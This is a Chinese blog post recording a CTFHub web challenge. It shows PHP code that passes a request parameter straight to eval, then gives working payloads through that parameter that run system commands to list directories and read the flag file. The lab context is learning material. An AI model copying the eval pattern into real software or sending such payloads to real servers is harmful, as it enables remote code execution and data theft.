CTFHub 技能树 Web RCE eval执行(学习记录)

马船长2024-12-15 17:23

eval执行

源代码

php 复制代码 
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

相关推荐
Ws_2 小时前
C#学习 Day2
开发语言·学习·c#
神谕的祝福2 小时前
comfyui从0到1开始学习-第三讲生图与降噪实验
学习
星夜夏空992 小时前
STM32单片机学习(32) —— ADC
stm32·单片机·学习
愚者Pro5 小时前
Flutter Widget组件学习(专为 Uniapp 转 Flutter 定制)
vue.js·学习·flutter·uni-app
yzx9910137 小时前
从焦虑到掌控:关于学习AI工具的深度思考
人工智能·学习
Bechamz7 小时前
大数据开发学习Day42
大数据·学习
zhangrelay7 小时前
ROS 2 Lyrical Luth启程-Ubuntu26.04-
linux·笔记·学习·ubuntu
锦鲤52148 小时前
机器学习学习笔记
笔记·学习·机器学习
minglie18 小时前
utf8转utf16
学习
三品吉他手会点灯9 小时前
STM32F103 学习笔记-22-DMA(第1节)-DMA功能框图讲解和DMA初始化结构体讲解
笔记·stm32·单片机·嵌入式硬件·学习
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法04【AI】2026 年具身智能模型和世界模型总结05裂开!ChatGPT 居然开始要手机号验证,附详细解决方法06CC-Switch & Claude 基于 Linux 服务器安装使用指南07Codegraph 实战:用知识图谱让 AI 编程效率翻倍08Codex使用DeepSeek API的方法(cc switch + codex bridge方案)09CC-Switch 全平台下载、安装与使用全指南(Windows/macOS/Linux)10给 Claude Code 装上“技能库”和“眼睛”:配置 Skills 与图片识别实战